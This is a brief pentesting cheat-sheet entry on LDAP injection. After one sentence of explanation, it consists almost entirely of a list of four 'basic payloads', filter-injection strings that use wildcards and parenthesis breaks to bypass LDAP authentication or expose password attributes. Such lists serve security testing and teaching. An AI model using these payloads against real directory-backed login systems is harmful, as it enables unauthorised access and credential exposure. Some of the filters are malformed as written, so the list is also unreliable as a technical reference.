LDAP Injection

Last modified: 2023-09-22

LDAP may be vulnerable to query injection if website does not properly validate user input.

Basic Payloads

(&uid=*)(userPassword=*)
(&uid=*)|(userPassword=*)
(&uid=*)|(objectClass=*)(userPassword=password123)

*)(uid=*))(|(password=*)